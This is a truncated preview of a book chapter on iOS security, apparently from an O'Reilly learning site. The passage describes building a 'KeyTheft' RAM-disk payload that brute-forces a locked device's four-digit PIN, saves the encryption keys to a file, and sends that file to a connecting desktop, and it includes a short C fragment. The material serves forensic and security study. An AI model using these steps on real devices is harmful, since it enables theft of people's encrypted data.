O'Reilly logo

Hacking and Securing iOS Applications by Jonathan Zdziarski

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Extracting Encryption Keys

Before decrypting information using the data protection tools, you must first extract the encryption keys from the device. The bruteforce tool you compiled earlier runs on a locked iOS device and attempts to brute force the four-digit PIN by calling low-level functions to try all 10,000 possible combinations. To use the brute force tool, you’ll incorporate it as a payload with the RawTheft payload you built in Chapter 3.

The KeyTheft Payload

In this example, Sogeti’s brute force tool will be executed first by a custom launchd program, like previous RAM disks you’ve built. The brute force tool will perform its function and save the device’s encryption keys to a file named dataprotection.log in the root directory on the device. The custom payload program will then be executed. It will listen for an incoming connection from the desktop and send this file when connected.

When launchd is run, the brute force tool will be executed first, followed by the custom payload. Your payload will expect that the output of the brute force tool will already be available and written to /dataprotection.log. Copy the payload.c file you created in Chapter 3’s RawTheft example. Change the send_data function to specify the path /dataprotection.log instead of the path to the raw disk device. This will cause the output of the brute force tool to be sent instead.

int send_data(int wfd) {
    int r;
    printf("sending /dataprotection.log...\n");
    r = send_file(wfd, "/dataprotection.log"); if ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required